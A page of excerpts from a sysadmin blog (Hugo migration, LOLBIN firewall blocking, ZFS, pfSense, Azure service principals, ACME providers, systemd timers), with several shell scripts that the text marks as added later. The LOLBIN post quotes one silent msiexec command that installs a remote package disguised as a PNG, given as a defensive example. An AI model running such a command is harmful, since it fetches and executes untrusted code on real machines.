Blog update

I’ve decided to migrate this blog to Hugo for several reasons. Hugo generates a static site, so there is no longer a server-side stack (MariaDB, PHP and WordPress itself) that needs constant updating. It also removes the attack surface of the WordPress ecosystem (themes and plugins). I used wp2hugo to do the heavy lifting, since this blog is very simple and a good candidate for it. A couple of fixes later, this is the result, and I’m happy with it. ...

January 19, 2025

Blocking Living off the Land binaries (LOLBINs) with Windows Firewall

Many types of malware and remote access trojans (RATs) today use built-in Windows binaries to stage and infect computers. Programs commonly used in such attacks are powershell.exe, regsvr32.exe, rundll32.exe, certreq.exe, certutil.exe and mshta.exe. Living off the land binaries (LOLBINs) bypass protections such as AppLocker's default rules, since they reside under C:\Windows and are code-signed by Microsoft. One example, which quietly installs a package fetched over HTTP:

    msiexec /q /i http://192.168.100.3/tmp/cmd.png

A great overview of how built-in binaries can be "abused" to download or execute code can be found at the LOLBAS project. ...

December 5, 2022

Expanding ZFS pool online

At work I’m setting up a new syslog server and wanted the logs stored raw on disk (that is, not gzip-compressed by the log rotation). To still save space I created a ZFS pool with compression enabled, which compresses transparently. First I created a zpool with a single disk (this is a VM, so no redundancy is needed):

    # Create a pool with the name 'zlog'
    zpool create zlog /dev/sdb
    # Enable compression
    zfs set compression=on zlog
    # Set the mountpoint
    mkdir /logs
    zfs set mountpoint=/logs zlog

This results in a mounted ZFS volume: ...
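The actual online expansion, as an added example that is not part of the original post: grow the single-disk pool above after the VM's virtual disk has been enlarged. It assumes Linux with OpenZFS, the pool name 'zlog' and device /dev/sdb from the post, and a SCSI-attached disk (for virtio-blk the kernel notices the new size by itself and the rescan step is unnecessary).

```shell
#!/bin/sh
# Added example (not from the original post): grow pool 'zlog' on /dev/sdb online after the
# VM disk was enlarged. Assumes Linux + OpenZFS and a SCSI disk; pool/device names are the
# ones used in the post above.
set -eu

# sysfs knob that makes the SCSI layer re-read the capacity of a block device
rescan_path() {
    printf '/sys/class/block/%s/device/rescan\n' "$(basename "$1")"
}

expand_pool() {
    pool=$1; dev=$2

    # 1. Make the kernel notice the larger disk
    echo 1 > "$(rescan_path "$dev")"

    # 2. EXPANDSZ shows space ZFS can see but has not claimed yet
    zpool list -o name,size,expandsize,free "$pool"

    # 3. Grow the vdev to the device size. ZFS owns the whole disk here, so it also grows
    #    the GPT partition it created; a pool built on a partition you carved yourself
    #    needs that partition grown first (e.g. with growpart).
    zpool online -e "$pool" "$dev"

    # 4. Let future size changes be claimed automatically on import/online
    zpool set autoexpand=on "$pool"

    zpool list -o name,size,expandsize,free "$pool"
}

# Usage: sh expand-zlog.sh zlog /dev/sdb
if [ "$#" -eq 2 ]; then
    expand_pool "$1" "$2"
fi
```

Check the EXPANDSZ column before step 3: if it is still "-" after the rescan, the kernel has not seen the new size and `zpool online -e` will do nothing.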

August 30, 2022

Flow control causing SFP+ module to stop working on link down

I recently purchased a MikroTik CRS309-1G-8S-IN router/switch and some generic SFP+ modules from FS.com (a mix of 10GbE RJ45 and 850nm MMF modules) to upgrade my home network to 10 gigabit ethernet. One thing I noticed using SwOS version 2.13 on the switch is that after a link down event (such as when a computer is turned off) the corresponding SFP+ module would stop responding. To make it work again I would have to reboot the switch or reinsert the SFP+ module. The same thing happened with some Intel FTLX8571D3BCL-IT modules I had on hand. ...

October 22, 2021

Upgrading zpool (zfs) feature level on pfSense with GPT (UEFI) boot

After a pfSense upgrade where the underlying base system was also upgraded, such as from 2.4.5-p1 (FreeBSD 11.3) to 2.5.1 (FreeBSD 12.2), it is wise to upgrade the ZFS pool feature level. If booting from GPT (UEFI) with a ZFS zroot, the feature upgrade has some gotchas that can leave the system unable to boot. Before doing this, take a configuration backup and have a restore image/USB stick ready. This example uses a single-disk setup, with no zpool mirror or stripe. ...
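The procedure as an added example (not the post's own commands): the loader written to disk at install time may not understand the features that `zpool upgrade` turns on, which is the usual way such a system ends up unbootable, so the boot code is refreshed from the upgraded base system right after the pool upgrade. It assumes FreeBSD 12.x, the pool 'zroot' on a single disk ada0, the EFI system partition at ada0p1 and the freebsd-boot partition at ada0p2; verify the layout with `gpart show` before running it.

```shell
#!/bin/sh
# Added example, not from the original post. Upgrade zroot's feature flags on a FreeBSD 12.x
# based pfSense and refresh both the UEFI and the legacy GPT boot code afterwards.
# Assumptions: single disk ada0, ESP = ada0p1, freebsd-boot = ada0p2 (check with gpart show).
set -eu

# Filter 'zpool get -H all <pool>' output (tab separated: name, property, value, source)
# down to feature flags still disabled, i.e. what 'zpool upgrade' would enable
disabled_features() {
    awk -F'\t' '$2 ~ /^feature@/ && $3 == "disabled" { print $2 }'
}

show_pending() {
    zpool get -H all "$1" | disabled_features
}

upgrade_and_refresh_boot() {
    pool=$1; disk=$2
    zpool upgrade "$pool"

    # UEFI boot: copy the loader from the upgraded base system onto the ESP
    mkdir -p /mnt/efi
    mount -t msdosfs "/dev/${disk}p1" /mnt/efi
    cp /boot/loader.efi /mnt/efi/efi/boot/bootx64.efi
    umount /mnt/efi

    # BIOS/CSM boot: refresh the GPT ZFS boot code in the freebsd-boot partition
    gpart bootcode -b /boot/pmbr -p /boot/gptzfsboot -i 2 "$disk"

    # Nothing should be left disabled now
    show_pending "$pool"
}

# Usage: sh upgrade-zroot.sh zroot ada0
if [ "$#" -eq 2 ]; then
    echo "features that will be enabled on $1:"
    show_pending "$1"
    upgrade_and_refresh_boot "$1" "$2"
fi
```

Run `show_pending` on its own first: if it prints nothing there is nothing to upgrade and no reason to touch the boot code.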

April 26, 2021

SEND_FPDMA_QUEUED - CAM status: Command timeout on pfSense ZFS install

When installing pfSense 2.5.0 on a Seeedstudio Odyssey Blue J4105 I observed the following error messages in the system message buffer after selecting the ZFS install:

    ahcich0: is 00000000 cs 00000000 ss 00000080 rs 00000080 tfd 50 serr 00000000 cmd 0000d117
    (ada0:ahcich0:0:0:0): SEND_FPDMA_QUEUED DATA SET MANAGEMENT. ACB: 64 01 00 00 00 40 00 00 00 00 00 00
    (ada0:ahcich0:0:0:0): CAM status: Command timeout
    (ada0:ahcich0:0:0:0): Retrying command, 3 more tries remain

After retrying a couple of times the installation completed successfully. After the install this error caused the boot to stall for some time, but it booted successfully. ...

February 20, 2021

View service principal assignments (permissions) in Azure

At work we recently moved our DNS hosting to Azure DNS to simplify our hosting and benefit from the existing RBAC in Azure AD. One benefit of the move is that we can create limited credentials (a service principal) for clients so they can use the ACME DNS-01 challenge for certificate validation. We have been using acme.sh, and it has documentation on how to create a limited service principal for DNS-01 validation. This works really well, but what if you want to view the permissions the service principal has? ...
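One way to answer that question, as an added example rather than the post's own commands: list every role assignment the service principal holds and flag any that is broader than a single DNS zone, which for a DNS-01 principal is the only scope it should have. It assumes Azure CLI 2.x logged in to the right tenant and subscription; the display name passed on the command line is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post: audit the RBAC role assignments of a service
# principal such as the one acme.sh uses for DNS-01. Assumes Azure CLI 2.x, already logged in.
set -eu

# Resolve a service principal display name to its appId (one of the values --assignee accepts)
sp_app_id() {
    az ad sp list --display-name "$1" --query '[0].appId' -o tsv
}

# Role assignments at every scope, including inherited ones, as 'role<TAB>scope' rows
list_assignments() {
    az role assignment list --assignee "$1" --all --include-inherited \
        --query '[].[roleDefinitionName, scope]' -o tsv
}

# Keep rows whose scope is broader than one DNS zone. The expected assignment for a DNS-01
# principal is 'DNS Zone Contributor' on .../providers/Microsoft.Network/dnszones/<zone>,
# so anything this prints (a resource group, a subscription, ...) is over-privileged.
find_broad_scopes() {
    awk -F'\t' '$2 !~ /\/providers\/Microsoft\.Network\/dnszones\/[^\/]+$/'
}

audit_sp() {
    app_id=$(sp_app_id "$1")
    echo "== all assignments for $1 ($app_id)"
    list_assignments "$app_id"
    echo "== assignments broader than one DNS zone (should be empty)"
    list_assignments "$app_id" | find_broad_scopes
}

# Usage: sh audit-sp.sh "acme-dns01-client"
if [ "$#" -eq 1 ]; then
    audit_sp "$1"
fi
```

`--include-inherited` matters: a principal with nothing assigned on the zone itself can still reach it through a Contributor assignment on the resource group or subscription, and that is exactly what the second list is meant to catch.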

February 1, 2021

Moving from KMS activation to Digital License (subscription)

At work we are moving everything to Microsoft 365 and Azure AD and removing our on-premises environment. One issue we encountered was that when we removed a computer from the domain and joined it to Azure AD, Windows was still activated against our KMS host. To convert the computer to step-up activation (a digital license), we had to install the OEM product key that came with the machine; Windows then automatically changed the activation to a digital license subscription. ...

October 8, 2020

List of free ACME SSL providers

Please note that many ACME clients only support Let’s Encrypt. Certbot should work with alternative ACME providers.

Buypass Go SSL
Norwegian certificate authority offering free SSL certificates valid for 180 days (Technical specifications). No wildcard certificates.
ACME directory URL: https://api.buypass.com/acme/directory
Chains up to "Buypass Class 2 Root CA", valid until 2040
DNS CAA: buypass.com
Rate limits: 20 per registered domain/week, 5 duplicate certificates/week.
Example commands for Certbot / acme.sh:

    # Certbot
    certbot register -m 'YOUR_EMAIL' --agree-tos \
      --server 'https://api.buypass.com/acme/directory'
    certbot certonly --webroot -w /var/www/example.com/public_html/ \
      -d example.com -d www.example.com \
      --server 'https://api.buypass.com/acme/directory'

    # acme.sh
    acme.sh --server https://api.buypass.com/acme/directory \
      --register-account --accountemail 'YOUR_EMAIL'
    acme.sh --server https://api.buypass.com/acme/directory \
      --issue -d example.com -d www.example.com \
      --webroot /var/www/example.com/public_html/ \
      --days 170

Let’s Encrypt
US based certificate authority offering free certificates valid for 90 days. Currently the default in most ACME clients (certbot, acme.sh etc.). ...

June 30, 2020

Configuring systemd user timer

To run systemd timer jobs (the systemd equivalent of cron) as a user, first create the user unit directory:

    mkdir -p ~/.config/systemd/user/

By default systemd only runs user timers while that user is logged in, so to run jobs without a login session enable lingering for the user:

    loginctl enable-linger username

Then drop the .service and .timer files in the ~/.config/systemd/user folder. To pick up the job you’ll need to run (as the user) ...
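The whole procedure end to end, as an added example that is not part of the original post: write a .service/.timer pair into the user unit directory, enable lingering, reload the user manager and start the timer. The unit name 'backup' and the script path ~/bin/backup.sh are placeholders; it assumes a Linux host with systemd and loginctl.

```shell
#!/bin/sh
# Added example (not from the original post): hourly per-user systemd timer.
# 'backup' and ~/bin/backup.sh are placeholders; assumes systemd with loginctl.
set -eu

# Write backup.service and backup.timer into the given user unit directory
write_units() {
    dir=$1
    mkdir -p "$dir"
    cat > "$dir/backup.service" <<'EOF'
[Unit]
Description=Backup home directory

[Service]
Type=oneshot
# %h expands to the user's home directory in user units
ExecStart=%h/bin/backup.sh
# A one-shot job rarely needs more than this
NoNewPrivileges=yes
PrivateTmp=yes
EOF
    cat > "$dir/backup.timer" <<'EOF'
[Unit]
Description=Run backup hourly

[Timer]
OnCalendar=hourly
# Catch up on a run missed while the machine was off
Persistent=true
RandomizedDelaySec=5m

[Install]
WantedBy=timers.target
EOF
}

# Register the timer with this user's systemd instance
activate_timer() {
    loginctl enable-linger "$(id -un)"    # keep the user manager alive without a login session
    systemctl --user daemon-reload        # pick up the new unit files
    systemctl --user enable --now backup.timer
    systemctl --user list-timers backup.timer
}

# Usage: sh user-timer.sh --activate
if [ "${1:-}" = "--activate" ]; then
    write_units "$HOME/.config/systemd/user"
    activate_timer
fi
```

`systemctl --user daemon-reload` is the step that makes the new files visible; without it `enable` fails with "Unit backup.timer not found" even though the files are in place. Check the result with `systemctl --user list-timers` and `journalctl --user -u backup.service`.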

June 27, 2020